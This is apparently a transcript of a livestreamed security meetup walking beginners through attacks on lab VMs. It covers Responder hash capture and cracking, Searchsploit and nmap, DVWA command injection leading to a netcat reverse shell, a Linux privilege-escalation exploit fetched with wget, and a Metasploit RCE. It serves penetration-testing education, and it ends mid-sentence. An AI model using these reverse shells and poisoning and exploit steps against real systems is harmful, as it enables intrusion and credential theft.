There we go. Hi, this is Steve Campbell, and this is the February 8th 757 White Hat Hackers meetup group meeting. And this is the first time I'm testing out doing this as a live stream so that people who can't make the meetings due to the drive or whatever can still participate. Just a minute while I get things set up and we'll get rolling. Okay, the first thing I want to talk about is setting up a virtual lab. So here I'm using VirtualBox. And the one thing that sometimes people miss when they're setting up a VirtualBox lab is the network. So let's look at the preferences, network. Now the different ways that you can have a virtual machine set up for the network is NAT. That's simply, say for example, if the physical adapter had a 192.168.1. whatever address, NAT would basically give it another private IP address, like say maybe 10.0.2.0/24, and it would NAT any connections to the outside. NAT network, well, first of all, NAT, if you put an adapter on NAT for a virtual machine, it can communicate with the outside, but it can't communicate with your other virtual machines in your lab. So if you're going to be running, say, for example, Kali Linux and attacking another vulnerable system, you do not want to use just NAT. You will want to use NAT network. Here I already have a NAT network defined. But when you first start out, you won't have this NAT network. There won't be any. So I'll show you how to set that up in a second. Bridged adapter treats it just like another physical adapter on your network. So if here on my home network, my IP address is 192.168.1.5, for example, my home router will see this as another physical adapter on the same network and give it the same an IP address in the same range. Then we have internal network. And to be honest, I've never used that one before. For what I understand, it's just like NAT network, but it doesn't communicate with the outside. Could be wrong on that. Maybe somebody could Google that for me and post it in the chat. Now, host-only adapter. This is the way that it's normally recommended that you run vulnerable virtual machines. The reason why is because host-only adapter, any of your virtual machines that are on host-only, they can communicate with each other, but they can't communicate with the outside world. So if you're running a vulnerable virtual machine, that can be a good thing. I'm going to use NAT network today because this way any vulnerable services, like say for example web servers or otherwise, they can communicate with the outside, but the outside can't communicate in to access those vulnerable services. So I mentioned a minute ago how to set up that NAT network. So under VirtualBox, you go under Preferences, Network. When you open this for the first time under Networks and Host-Only Networks, there won't be any defined. You'll need to click the plus over here to the right and add one. The same with host-only networks. Then any machines that you want to be able to communicate need to make sure that they're on the same network. So here I have NAT network and NAT network. So I'm going to be running these. They're on the same network so they can communicate. That network. That network. Okay. Now the next step is if you haven't already downloaded it, you're going to want a copy of Metasploitable 2. So just simply search for Metasploitable 2. And by the way, there is a Metasploitable 3, but the big difference between 2 and 3 is Metasploitable 2, it's been out for a few years. It looks like since 2012 here. And it's based on Linux, specifically Ubuntu Linux. Metasploitable 3 is based on Microsoft Windows Server 2008. And it's a little bit more difficult to set up. And the reason why is because it runs on Windows, they can't distribute. Just one second. They can't just distribute the virtual machine, because then it would be what, copyright infringement, I believe. So you basically have to build this yourself, and there's some problems with that. I plan on posting a blog post soon on how to build Metasploitable 3, because so far the most up-to-date information on their website leaves a little bit to be desired, because I always get an error, but I've recently found a way around that. So I'll do a separate blog post on how to build Metasploitable 3. I will be using it at some point during the presentation today. But you have to install all these different components, run a build script. It fails towards the end, then you have to make an adjustment, and then rerun another script. So we'll get to that later. So here on Metasploitable 2, if you download the latest version, once it's downloaded, which I've already downloaded it, let's see, I've got it. I'm going to delete this one because I made some edits to it. Start over. Now I've got a copy of it here. Another thing that I'm going to be showing during this presentation you can actually download trials of various versions of Microsoft, like say 7 through 10. So let's check that out. I can never remember where it's at, so I did a blog post about it a while back. On my website here, stephencampbell.info, if you scroll down right here, vulnerable Windows virtual machines to hack. I've already downloaded these. I'm going to show you where you can download them from. So you visit the Microsoft developer website. You can select your version of Internet Explorer on the version of operating system, and they recently released a removed Windows XP, so I just happen to still have an old copy around. So once you select your version, you can select VirtualBox, Hyper-V, or whatever you're using there. Download it. I've already done that. So let's get started. So the first thing I'm going to be presenting here, now that we've got the lab setup out of the way. And before I move on, does anybody have any questions? The people who are watching live right now, do you have any questions about the lab setup? I'll pause for just a minute because I know there's some lag between me recording and you getting a chance to see it. So. Great. So this is what I'm going to do. I'm going to power that off. I'm not going to wait for it to update. I'm just simply going to re-import it. So yeah, that would be a good thing to show you. To import that Windows virtual machine I downloaded, let's see, import appliance. Let's see where to save that. It's an OVA file. And next, import, pretty easy. So while that's importing, I'll go ahead and make sure I've got Kali set up and ready to go. So now we're going to talk about responder. So responder is a link local, multicast name resolution, and NetBIOS name services, and I believe that's multicast DNS poisoner. Correct me if I'm wrong. With some built-in servers here. Now, like I said earlier, this is about gaining access and exploitation. So if you were on the local LAN, the same network, and it does have to be the same subnet. Responder won't work through a router on other networks, as far as I know. So the way you would install this in Kali is once you come to the responder page, click on clone or download, click this so it copies it to the clipboard. Then in Kali, I personally, just personal preference, like to install things from GitHub to opt. See, I've already got quite a few things installed there. So to install it there, you would go to opt, or you can even stay under /root if you want. You would type in git clone and paste that URL and hit enter. And I've already done that. So you see I've got a responder directory here. So to start it, I'm going to type dot is the current directory /responder.py. I'm going to use, well, let's just look at the options first. So I'm going to use -i for the interface. Oh, I just realized one very important thing I didn't cover. ifconfig. So this is my address. It's a /24. So something I skipped over earlier when we were talking about the lab setup, and it's going to be very important throughout this presentation, is once you've started up multiple virtual machines, and before you can attack whatever vulnerable system with Kali, you kind of need to know what their IP address is. I mean, theoretically, you could scan your whole /24, your whole network, and find it. But there's a tool that's built into Kali, and I use this every time I work on a virtual machine from VulnHub or wherever, and it's called NetDiscover. -R for range. My network is 10-0-2. Oops, better turn on numlock. 10.0.2.0/24. If you're wondering where I got the 24, right here, each of these is 8 bits. That's 8 bits. This is 8 bits. That's 8 bits. This is a clean /24. 255.255.255.0. And hit enter. By default, NetDiscover won't show you your own IP address and MAC address. Oh, you know what? That's still importing and I haven't started it. So let's cancel this. Okay, that's finished importing. Let's check our network. Network. I'm also going to give it a little bit more RAM. And let's start it. So what we're going to be doing with Responder here is we're going to be poisoning the local LAN. And anytime one of the clients on the local LAN attempts to connect to a service, the way DNS works is, say for example, you type in www.google.com or whatever domain name in your browser, or say you open Explorer and want to get to a file share. To get to that name, to resolve it to an IP address, one of the first things your computer is going to do is it's going to look in your local host file. In Windows, let's go away. This thing will. That thing won't go away. Anyway, Windows, hopefully that little box will go away eventually. Bugging me. System 32. Drivers / etc. If you want to edit this, you actually have to do it this way. You actually have to run Notepad. You have to right click. For Pete's sake. This thing's lagging a little bit. Something's trying to update here. It's lagging. Okay. Run as administrator. File, open. Windows. System 32. Drivers, etc. Change this to all files and the host file. So in your browser or Explorer, you try to get to a website or a remote computer. It has to resolve it. Before it even goes out to DNS, it's going to check your host file. So if you want to override DNS settings, you can actually put in an IP address, a tab, and a host name in here. In fact, when I'm doing penetration tests, sometimes I'm switching back and forth between development and production, and I have to do this frequently. So after it checks your host file, and by the way, under Linux, that's under /etc/hosts. After it checks that, it goes out and checks DNS. If the DNS lookup fails, then it checks, it does a broadcast on your local LAN to LLMNR, Link Local Multicast Name Resolution, and then NetBIOS Name Services. So what we're going to be doing is anything that doesn't get resolved via DNS, like say somebody typos something, we're going to be listening and we're going to intercept that. Another thing that we're going to be doing with Responder, actually we don't want Edge. Is we're also going to be spoofing the WPAD file. So here in Internet Explorer, under Internet Options, Connections, LAN Settings. By default, automatically detect settings is checked. So what's going to happen is your browser is going to be broadcasting on your local. Ooh, somebody's having problems here in the chat window. Anyway, I hope they get it sorted out. So it's going to be broadcasting for the WPAD file on your local network. And we're going to be intercepting that as well. So let's minimize this. And the responder, we're going to use -I, our network interface. Let me show you those options again. We're going to be using -I for the interface. We're going to be using R, where is that in here? For redirect. Enable answers for net bias redirect suffix queries. Now, this isn't a good idea in a production network. Definitely would not use -R. -W for WPAD. Start the WPAD rogue proxy server. Definitely want that. We're going to be using -LM. Force landman hashing downgrade for Windows XP 2003. Since I'm not going to be attacking Windows XP in 2003 in this demo, I'll leave that out. And -V for verbose. So let's do that. Okay. Now this listening, remember, like I said earlier, this is only effective against computers on the same LAN. Now over here on our target, eventually, if we're patient, we're going to get some hashes in here. You can also try browsing for something that doesn't exist here. Ah, there we go. Success. Well, it's an intermediate step anyway. We don't have an actual password yet. Okay, so what we want to do at this point is we want to stop this. I'm going to press Control-C. And I'm going to grab these hashes. So here we see we have some hashes. So the way I'm going to crack this, now this is just my personal preference. I know most of you won't be set up this way. I'm going to save this off to my local machine. See, I have this downloads folder. When I want to share something with a host machine that's running VirtualBox, which is Windows 10 in my case, I have shared folders. I have it set up to auto mount so that I can copy and paste files between the different virtual machines. So I believe I just saved this here already. Okay. So now let's minimize this for a minute. And here on my host machine, I'm going to be using Hashcat. Now you can certainly use Hashcat in Kali Linux, but it turns out this laptop I have has a CUDA compatible graphics card. Let's find out what that is and what it means to password hashing, password cracking. So CUDA is basically a parallel computing platform. I'm not going to sit here and read all this to you, but basically what it does is your GPU, your graphics processing unit, is much more powerful than your CPU for doing intense mathematic computations, which is exactly what you're doing when you're trying to crack password hashes. So I've downloaded Hashcat. Now this is already in Kali Linux, but if you're running on a virtual machine, I don't think you're going to be able to, or at least you're going to have a hard time using the built-in graphics card to crack these. So they have a Windows version as well as a Linux version. They may have for other operating systems as well. But I'm going to be using the Windows version. So I've downloaded it here. It doesn't require any installation. And it comes with all these example commands. Let's take a look at one of these. So that's your dictionary. Executable -M400, that's for the type of hashes. And their website for Hashcat has a lot of has all the different examples for every type of hash that Hashcat can crack. It just so happens that for these type of hashes for Windows, we're going to be using, and I created this one. I basically made a copy of this example 500. And you can see that this is cross-platform. We have bash shell files here for Linux and command files for Windows. So I took this example 500 command, made a copy, and changed it to 5600 because that's what the M5600 is what we need for cracking these Windows hashes. Let's see, we have a comment here. Yes, in fact, if you take pen testing with Kali, Brandon, Brandon says, I was just reading about this earlier, Cain and Abel would take 1.5 hours to password crack a 6-character password with a CPU, but a GPU could do it under 4 seconds, brute force that is. When I was taking pen testing with Kali for OSCP, there's a word list that's built into Kali Linux called RockU. Using Hashcat or John or whatever in Kali Linux running on a virtual machine might take hours, but I could burn through the rocku.txt dictionary file in about 7 seconds using this Hashcat using my CUDA compatible laptop GPU. I have an NVIDIA GPU. So anyway, I made a copy of this and I put the full path in here to everything. So let's see, we got -M5600, that's for the type of hashes. And like I said, there's a reference on the Hashcat website. The path to this file, which I just downloaded, by the way. That's not it. I know I just saved that. Just a minute while I find my file. I may have to copy that again real quick. Bear with me here. Okay, the date doesn't look right, but anyway, it must be the one. So I'm going to copy this over. And I'm going to edit this. Here's my word list. Now my word list in this case is really simple because I don't want you to sit here and be twiddling your thumbs for an hour while I go through like millions of passwords. So I put some very simple passwords in here. And I already know what the password is because Microsoft gives it to you, but this is, like I said, is a demonstration. So this is my word list. If this was a real life event where I was doing a pen test, I would use one of my other word lists that's say about 1.5 gigabytes, I believe. So anyway, and the output -O is where it's going to save it, and it's going to pause so that we can see the password on the screen. So let's go ahead and run that. Run it as administrator. Separator unmatched. Something's not right here because that says HTTP, but I'm using SMB. Let's save it. Here we go. Okay, so here's the password right here. It cracked it that fast, but of course it's a very small dictionary we had to use. Using the RockU that comes with Kali Linux, I've cracked passwords in a few seconds to maybe a little over an hour with a larger word list. So that is why you don't want to use too simple of a password, because I can tell you from experience, a pen tester or a bad guy on your local network can grab your password hashes, and if your password isn't complex enough or long enough, then it can be cracked. So that was Responder. Any questions before I move on? And for those who are going to be watching this later, please understand that I have a group of people from our meetup group that are watching this in real time and asking questions. So that's why I'm going to pause and ask if anybody has questions from time to time. If there's no questions, I'll go ahead and move on. So that was the first way to gain access on the local LAN. Now that I have their password on a port scan, I can look, for example, port 3389 TCP open and RDP into the machine to get access. I could also run Metasploit's SMB exec and use that password, or on older versions of Windows, actually the password hash will work too. So that's enough for Responder. The next thing I want to talk about is ExploitDB. This is run by Offensive Security, the same people who who design Kali Linux, the distribution. So exploitdb.com. So it's got over 36,000 exploits archived, but it also has more than just exploits. So it has remote exploits, web application, local and privilege escalation, denial of service, shellcode, papers, research papers, the Google hacking database, which is simply if you type in one of these into Google, it'll give you links to possibly vulnerable systems. So how I normally use this is I'll do a port scan or vulnerability scan, and when I find different versions of different services, I'll go here and search. So you can enter here the title, the CVE number, or other words. Here on the website, you'd have to certify you're not a robot and then click search. So let's do, it's just something I remember off the top of my head. Good old MS08-067 from the Windows XP and Server 2003 days. So you can download it from here. Now, the way I actually like to use the exploit database is there's a local copy of it that's on Kali Linux. Let's take a look at that. So now we're going to be talking about Searchsploit. Searchsploit was made by Offensive Security as a way to search the local repository of ExploitDB. So instead of going to their website, right here in Kali Linux, if you just type in Searchsploit with no other options, so basically everything that's on exploit-db.com is also right here cached locally in Kali. So let's take a look at some of these options. The case, perform a case-sensitive search, the exact match, the help, JSON format, that would be useful if you were doing some scripting, mirror. Mirror basically copies that exploit to the current working directory. And the reason why you might want to use that is, let's do a quick search and I'll show you. Okay, so where these are located on Kali Linux is this path plus this path. Now there are times that you can't just use these exploits as is and you have to modify them, to tweak them to get them to work on your target. So because of that, you don't want to edit their original in case you muck it up. Plus it's easier to copy over to your target if you mirror it to the current working directory. And I'll be showing you that later on too. The path, search just the title. Of course, you want to do updates from time to time. This is another good one, -W, show URLs to ExploitDB. Examine, ID, and Nmap, and we'll be covering these in just a minute. So let's do that previous search, and let's go -W. Now over here, we actually have the link to it to open it on the website, so we can read through it, we can view any instructions and see how it needs to be compiled, how it needs to be run, what the target is, the target operating system, etc. It's also, I can tell you right now, it's a very good idea to read the source code, even if you don't understand it all. It's important to at least have an understanding of Python or C programming, because it's rare, but I have found exploits before that will do rm-rf and delete your stuff and damage your system. Now, it's not so bad if you're doing this in your lab, but if you're using these exploits for work on a client's network, it could be very bad. So don't just run anything without checking it out first. So normally at the top, you'll have some comments where you can figure out what you need to do. You can find references to it. So that's -W. Let's see. Some more examples. So some of these are going to have a lot of results on your search. Some of these say DOS. I've never had any circumstances where I've ever had to run a denial of service, and those just clutter up the screen. So what I'll do in that case is I use some good old bash and type grep dash, I think it's -V. So grep-v basically filters out anything by that term, which I've used DOS. So that kind of cleans it up just a little bit. And now you can also add in local for local privilege escalation. You see we have a lot less to choose from here. Now another very interesting option I want to show you. Okay, I don't have any XML files, but we're about to. So give me just a second. We're going to do a quick nmap scan, and this is an awesome feature, the XML searching. You can actually take an nmap scan and save it in XML format, and then run it through Searchsploit, which will give you exploit recommendations. So now we're going to start up Metasploitable 2. But I've just realized that I haven't actually set it up. It'll only take me a second. But if any of you already haven't set up Metasploitable 2, you were downloading it earlier. Metasploitable 2, the virtual machine I downloaded earlier at the beginning of this, they don't have a .ovf file that you can import. It's actually in VMware workstation format. So we're going to go New. And by the way, you're going to be looking for the Metasploitable 2 you downloaded earlier. You should have already unzipped it into a directory. I'm going to call this and the type is Linux, and it's Metasploitable 2 is 32-bit. Next. Now 512 megabytes is plenty. I've got more than enough RAM, so I'm just going to leave it as is. But if you're short on RAM on your host system for your lab, you can lower it to 512 and it'll run just fine. Now we're going to use an existing virtual hard disk. And downloads, yeah, there we go. Let's check that network adapter. That network. Let's start her up. While we're waiting for it to start, somebody just commented that you should always test run the exploit in a lab environment before using it on a live system. That's a very good point. That's exactly why you should have a lab system, not only for learning, but also if you're a professional pen tester, you want to make sure that you're not going to damage somebody else's system and delete their data or crash their servers. Okay. So let's minimize this. Back over here in Kali. Remember that net discover we ran earlier? And I'm going to go ahead and shut down this edge. So not cluttering our screen. Watching the paint dry. So back here in Kali, that net discover. So the one I know from past experience, the .1, .2, and .3 are our actual VirtualBox itself. Doesn't show your own IP address in here. So the .16 is the one we're looking for. Let's Control-C to stop that. Now let's do an nmap scan of it. Nmap. So my favorite options are, let's see, dash, let's see, nmap, ls, suv. Now you can type -p for ports and 1 through 65535, but there's a shorthand as -p dash. I like to add in -a. That does script scans and gives you a little bit more information. To save some time, I'm going to leave that out this time. and 2.16. If you want to speed up your scans, you can also do top ports 1000. If you use top ports 1000, you get a much faster scan, and the top 1000 ports are the most frequently found ports, and it covers about 90-something percent, like 92, 93% of all the ports that Nmap can scan. So to speed this up a little bit, we'll use that. And I also want to add in -o and capital X for XML, and we're going to call this, that's going to be our output file. Let her rip. Okay. So now that we have this, remember that Searchsploit option? The -nmap. So let's use that. And we're going to do that grep again, -v DOS. That's a whole lot to look through, but this does point you in the right direction. But it's a lot to dig through. So this is basically taking all those ports and services and giving you some suggestions of different exploits you could use for each one. Like see here, telnet. Now, SMTP, one thing I noticed about this scan is it didn't actually give us a service version. Let's check this out. I don't remember every option. Let's just hit Nmap. -SV, okay. I have it right this time. Yeah, I left off my dashes earlier. Wow, I've done this so many times and I get in front of a crowd and I brain fart. I have some more comments here. Yes, you can minimize the output by knowing if the system you're going after is Windows or Linux. Then, like showed before with a grep-v, filter out the exploits that don't apply to your target. That's a good idea. Okay. And also, I shouldn't have used -p- if I'm using top ports. Okay, so that's giving us a little bit more information. Yeah, I definitely brain farted earlier. It's funny, I'm actually less nervous giving these presentations in front of a group in person than I am on the internet. It's just weird. This is the first time I've done this. Anyway, so here we have a little bit more information. Let's go back and run that Searchsploit again. A little bit less there, isn't there? It's because we actually grep-vi, the iadd. Yes, so Tim Kramer says you want to use grep-vi, the iadd's case insensitive to the filter. Okay, but I know from past experience that DOS is in lowercase in Searchsploit, so I wasn't too concerned, but that is a good idea. So let's see. Okay, so that's how you can use the --nmap option. I think that's about it for Searchsploit from here. We're going to go back to it in a couple minutes when we actually exploit a system, but before I move on, are there any questions or comments? Okay, moving along, we're actually going to exploit a system now. I apologize to any of you that have been around for a while. I know this is moving a little slow and this is the basics. A lot of us are a little bit past this, but just keep in mind that this is for the people who've never done this before. We'll build up to the more advanced. In fact, we'll end up spending a whole 2 hours of some future meetings doing deep dives on some of these subjects. But for now, we're going to cover the basics. Yes, another comment, if I remember correctly, nmap looks at the top 1,000 or 1,024 ports by default. Okay, it's good to know. Okay, so now we have our scan of Metasploitable. Let me show you one more quick thing that we can do with that XML file. By the way, to do this, I'm basically just pressing the Windows key on my keyboard. I'm going to open Sparta here. By default, it's not over here in this menu, but if you hit your Windows key and just type Sparta, you can see it comes up here and you can click on it. So anyway, I've got Sparta open here. We go File, Import Nmap, and import that XML file. So here we've got hosts, services, and tools, which is going to be blank by default. So now from here, some of the things we can do, so we can right click, we can open with Telnet, with Netcat, FTP client. Let's take a look when we send it to Brute. We're not actually going to do this. I just want to show you some options here. So over here in the Brute tab, you can actually tweak this. You can select an FTP for us, but you can select the username, the password, a list, and browse for the file for username and password list. You can run nmap scripts, and it'll automatically run the correct scripts. Like say, for example, if it's an HTTP port, it'll automatically run the correct nmap scripts related to that. You can see here on anything that's HTTP or HTTPS, open the browser, take a screenshot of that page of the website. WhatWeb will tell you all the different technologies used on the back end of the web server. Run nmap scripts, run Nikto, WebSlayer, Dirbuster, grab the banner, etc. Okay. So I'm done with that. Now we know that port 80 is open. So something I want to show you about Metasploitable. Metasploitable 2, in addition to having some vulnerable services, like network services, it also has some vulnerable web applications. So in your own time, you can come back and take a look through all these, but these are all very vulnerable. Mutilidae and damn vulnerable web apps are good for taking a look at the OWASP top 10. They basically included most, if not all, of the OWASP top 10 vulnerabilities. Today we're going to be looking at damn vulnerable web apps. Right here it says default username and password is admin and password. You can brute force that if you want to ignore that just as an exercise, but we're looking for something a little bit past this. Okay. By default, when you get into a damn vulnerable web app, the security is going to be set to high. Now, you don't want to start out with it at high while you're still learning. Start out at low. When you get used to exploiting some of these web apps, move it up to medium. When you get bored with that, move it up to high. So just for demonstration purposes, we're going to set it to low and submit it. Okay, now it's currently set to low. So the only thing we're going to take a look at in here right now is command execution. Enter an IP address below. So 127.0.0.1, we're going to have it ping itself. And I'm not sure why this is running so slowly, because when I was preparing for this, it all ran extremely fast. Of course, when I'm showing it to somebody else, it's going to take its time. So we can ping an IP address, but what else can we do here? Okay, so in Bash, you can do ping -count 3 127.0.0.1, and you can separate that and run ID. See down here, after it ran the ping command separator ID, we see I'm root here. There's others as well, like 1 ampersand, 2 ampersands. I'm not going to go into the difference between the two. That's kind of getting off track. But you see, it kind of does the same thing. So in here, let's do and so now we're testing to see if we have command injection. We got it. So that ls command, we have a list of files right here. So now we want to see how can we exploit this. Thank you. Thanks, baby. So how can we exploit this? So do they have netcat installed? Yes, we have netcat installed, so that's a big plus. Let's take a look at Pentest Monkey's reverse shell. Very useful. I refer back to this very frequently. So these are some of the different ways we can inject a command in here to give us a shell back to our system. Using Bash, I can tell you right now from past experience, this one works frequently, but it's not going to work on this particular exercise. Perl, there's netcat. So let's copy this. And we're going to replace this with our IP address. Before we hit submit, clear our screen. Netcat is basically like a pipe. It's like a network pipe. And you can send data and connect between various systems, send and receive data through it. Very useful for getting a shell from exploited systems. So let's look at some help. So -H gives you help. Basically, what I'm going to use is netcat-nlvp, which I believe is no DNS lookup, listen, verbose, and port 1, 2, 3, 4. So we're listening for this shell from netcat right here. The netcat-e is for execute, bin shell to our IP address and our port. What do we have here? So we don't have a prompt, but don't let that throw you off like it's done some people in the past, including me a long, long time ago, where you think, oh, there's no command prompt. What's going on here? It's locked up. So let's enter something. Wow. So we're running as www.data. Now, so www-data is a low privileged user on the system, and we want to get to root because it's Linux. So from here, let's do a couple of quick commands. uname-a. So for privilege escalation, very important that we know what kernel version and what system we're working on. So we know that we're running Linux, Metasploitable. We have the kernel version, i686, so it's a 32-bit system. Another one I like to do is cat, -etc/issue. Now here that just tells us we're on Metasploitable 2 and with some warnings and other information because they've edited. By default, however, this would tell you Ubuntu 16-04 or BSD version blah blah blah, whatever you're on. So it would give you some more information in a version in addition to that kernel version you already saw with uname that you could use to look up privilege escalation exploits. So we know that we're running Linux, and I can tell you from looking it up that Metasploitable 2 is running Ubuntu, and we've got 2.6.24-16 kernel. So now let's open a new terminal window and back to Searchsploit. We talked about Searchsploit earlier. Let's see, Ubuntu, because remember I said I know from looking it up that Metasploitable 2 is running Ubuntu, and local exploits and 2.6. Okay. So let's do this with a -w so we can read a little bit about each one. So this tells you about the versions, the shout out, whoever made it, what it's been tested on, and some instructions here. Do this command and set the first argument to this. And that argument is the PID of the netlink socket. It's also UWD PID -1. To save you some time, I can tell you right now that this isn't my favorite version of this exploit. Let's look at the second one, 8572. Gives you a little bit more information about it. And it says, the exploit will execute whatever temp-/tmp/run is root. So that should be your payload. And I'll show you how to do that in a second. Another way you can examine these is, instead of going out to the web, is dash, see, I don't know if it's 2 dashes or 1. Let's see here, it was 1 dash. 2 dashes. Dash ID 8572 and -x for examine. So you can also read about it here locally instead of having to go out to the internet to the website. Okay, so the one thing we need to remember about this is cat, we need to cat this right here. I'll type Q to quit. So see, where's that at? /proc/net/net link. So the 2293, that's the number we're going to use. Now another Searchsploit command, -mirror. Yeah, --mirror. Remember, I don't want to be editing or messing around with any of the originals. I like to copy them to the local directory. Okay, so now it should be locally. There it is right there, 8572-C. Okay, so I mirrored it locally. Now, how are we going to get this onto that remote system? So something I learned when I was taking pen testing with Callie for OSCP is Python -m for module, simple HTTP server, and after that you can have a space and put the port number, but if you just use the default, it's going to use 8000. So now over here, let's cd/tmp temp directory. So I'm going to do a wget URL port 8000 /8572.c. So we're going to copy that over. Pretty neat, huh? I've used this quite a bit for other reasons other than exploitation. Say, for example, at a previous job, I had a Linux server that was attached to a network tap that saw everything going to and from the internet, and I would run TCP dump and capture packet captures, but I wanted to look at them in Wireshark on my local Windows system. So I'd run this on the Linux system to create a little web server. And the way that looks is over here in my browser, I could type in the URL to that, like this URL here. In my web browser, I can view every file that's in that directory, like a directory listing, click on it to download it. Okay, I was waiting for that to finish, but I realized I'm not going to get a prompt, so let's look and see what we have. Okay, so the file is there, the 8572.c. And so what's next? So remember that /temp/run file? So that's what this exploit is going to run. So let's give it something to run. So now we're going to create our shell. So bash shebang, oops, and we're going to output that to run. Now we're going to echo the next line, and that's going to be /full path. I like to use the full path because sometimes in a lesser shell you may not it may not do the path for you. So nc -e for execute -bin/shell. Our IP address 10.0.2.6, and our port number we're going to use 4444. And now instead of 1 greater than, which would overwrite what's already in a file, we're going to be doing 2 to append. So 2 of those right angled or greater than appends. If we didn't use that, we'd be overwriting what was already in the file. So that's what's in the file. This is going to be what's going to be run by the exploit. So now we want to change mod plus executable run. and we want to compile that exploit at 8572.c. GCC, let's see, 8572.c, and -o for the output, 8572, enter. We're going to change that to executable. And make sure where we're at, we're in temp. And we're going to do ls. Actually, we're going to do ls attack L. Okay, so now we have our original C source. We have it compiled, and we can see that X's is executable. We can see our run, and it's also executable. The X's are executable. So before we run it, there's one more thing to do. Remember, this is going to reach out to port 4444 on a reverse shell. Now we don't need this Python simple server anymore, so let's close that and open netcat-nlvp. This is our listener, 4444. Now it's listening. So over here, we're going to type // that's for the current directory, 8572. Hit enter. Now we have an error, but that's fine. It's still going to work. Oh, I forgot something. I forgot the argument. Okay. I forgot the argument. Bear with me here. 8572 and 2293. Remember, we got to pass in this PID. Well, look at that in the other window. We have a connection. Woohoo! So let's see what we have here. Root. We are root. How about that? Okay, so we've manually run some exploits. We've used Searchsploit to find the correct exploit, and we now have root over the system. Give me a second to drink a little bit of water and refresh myself here. Before I move on, are there any questions or comments? I'll pause just a minute because I know there's at least a couple of minutes of lag between me recording and you seeing it on your end. Give people a chance to ask any questions. All right, I'm going to get set up for the next section we're going to talk about. I'm going to go ahead and shut these down. Okay, who's ready to dig into Metasploit? Now, Metasploit, very powerful, but you don't want to get too dependent on it because it can do a lot, but it can't do everything. All right, Brandon's got to run. Have a good one, Brandon. I'm glad you got to check in with us for a while. And this entire recording will be online later for you to check out. So now Metasploit. Now Metasploit, it was created by H.D. Moore in the first release. Somebody's giving me a duh. Good for you. Hopefully I'm not going too slow for you there, G Young, but this is for the newbies, and I hope I'm not boring you with a basic intro stuff. So Metasploit was created by H.D. Moore, and the first release was in October 2003, and it had a total of 11 exploits at the time. It was originally written in Perl and was later rewritten in Ruby for the 3.0 release in 2007. It's now owned by Rapid7, and there's 3 versions. There's a community version, an Express, and a Pro version. We're going to be using the free community edition that's included in Kali Linux. So the first thing you want to do is type in service post SQL start. We want to start the PostgreSQL database service. Now, if you've never run Metasploit before, you want to initialize the database. MSFDB and NIT. Okay, mine's already configured, so it's skipping the initialization. If you've never run it, run this command. It only takes a minute. While we wait for this to start, I can tell you that Metasploit is the speed of it's increased a lot with the later versions of Ruby. I think as a version 2.0 of Ruby and Kali 2.0, it's gotten a lot faster. It used to be painfully slow. Ruby was never known for its speed, but it's gotten a lot better. So now that we're in Metasploit, the first thing I want to talk about is workspaces. And we have tab completion. I already have some workspaces here. Oops. It says workspace-h. Now you're going to start out with a default workspace. -A to add a workspace. The reason why you want to use workspaces is after a while you're going to, like, say for example, so now I'm in the Metasploitable 3 workspace because I've already done a scan of this system. Let's look at services. So if I want to keep different systems or different networks or different scans separate, you use workspaces. -A to add one, -D to delete one, etc. Now, if you haven't already done a scan, in addition to using Nmap outside of Metasploit, you can import. You can do a db_import, import that XML file here from your Nmap scan, or you can do another scan with db_nmap. db_nmap basically does an Nmap scan, but it imports all the data into your Metasploit database. It accepts pretty much the same options as Nmap by itself. You can see though, I've already done a scan of Metasploitable 3. Let me make sure I have that fired up here. I have Metasploitable 3 starting in another window. You don't need to see that, so I'll minimize that for now. Now, I'm just going to pick one of these at random. Elasticsearch. So let's search. So just do a search and the service name. Let's see. I like RCE, remote code execution. That sounds good to me. Let's copy that. Let's do info. Gives us information about this module. Shows us the basic options, if they're required, yes or no, and the defaults, if you leave it at the defaults, and a description right here. Okay, so I like that one, so I'm going to use it. I'm going to go use, I'm going to paste it. If you don't want to paste it or you can't paste it, whatever the case is, you can do tab completion. You can start typing the path to it, hit tab, and it'll complete it as you go. Now you want to do show options. Oops. So let's look at required. Our host is empty. We definitely need that. Our port, it's already filled out for us. That already has a default. Okay, so the one thing we're missing though is the IP address. I can do net discover, or in this case, I'm just gonna log into it. The default login and password for Metasploit 3 is vagrant. 10.02.12. Okay, let's minimize this. So we're going to do a set. We can also do a set G for set global. The difference is set is only going to set that option inside of this one exploit. If you're going to use this host more than once, use a set G, our host, and I started talking, I forgot what it was. 10.02.12, okay. Okay, so I believe that's all we need at this point. Let me see here. So we have all the defaults and we have everything that's required filled in. Let's type in exploit. Bear with me for a second. Okay, we have a problem here. Let me go back over my notes and see what I missed. So I have it connected to path, exploit completed but no session created. Let's run it one more time. It's gonna be really strange if this doesn't complete and give us a shell, because I've ran this multiple times in the past and exploited this machine 5 ways to Sunday and it's never failed, but that's the way it works. Okay, maybe bouncing that host will give us some help here. It might be because the license expired. I know when I looked at this earlier today, I didn't get this error. So if you can bear with me for just a minute. I'm going to try another tactic. I'm going to nuke it from orbit because I have a backup copy. Let's see. So while we're waiting, and this is going to take a couple minutes, any questions or comments? Even if it's a duh. Come on, give me another duh. I want to hear it. I can take it. Five minutes, what? So what can we do? I can skip ahead. Oh, the rearm. Good idea. Well, it's a little bit too late now. I don't know if you're seeing me. You're not seeing me in real time. I know there's a delay. So I've already deleted that one, and I'm importing a copy of the OVF file. That is a very good point. Thanks for the duh. That is a very good point about the rearm. I've used it before. For some reason, didn't think of it this time. But that's the way it goes. I knew it wouldn't take 4 minutes. Okay. Check the network. Make sure it's on the same network. And start it up. And let's see if we get the same thing with the licensing. Cool, it's only 1 minute delay. Looks good. Windows license is expired. I don't have the black screen though, so maybe this will work this time. Really sucks that I actually rehearsed this today and had no problems. You know, I got to check that IP address again though. I just realized this is probably a different one. .10.02.12. And I think we had the same thing here. .0.2.12. Okay, so let's exploit it. Woohoo! We have an exploit. We have Meterpreter. Okay, so we're making progress. All right, now let's see the available commands. Just type a question mark here. Scroll back up. Background. If we want to send this session to the background so we can do other tasks in Metasploit, that's a good one. Let's see. When we're done with it, when we're going to exit. Interactive Ruby, if you like Ruby. Migrate's a good one. For example, if you've taken advantage of a browser exploit, they're not that stable, and if the user closes the browser, Internet Explorer, or whatever, you're going to lose your shell. So what you would do is, let's see, where is that at in here? Yeah, so you use migrate and you would give it the PID of another process so that you can migrate to another process. So if the user closes the browser, you still have it. Let's see. All this is pretty much self-explanatory. I'm just trying to pick over the most often used options. So for right now, I'm going to go sysinfo and get UID, forget the user ID. Username Metasploitable3. You can see the operating system version. My interpreter is Java/Windows, which is going to be a little bit limited, so we're going to fix that in a minute. We can type shell to drop into an operating system shell. And who am I? Ooh, we're 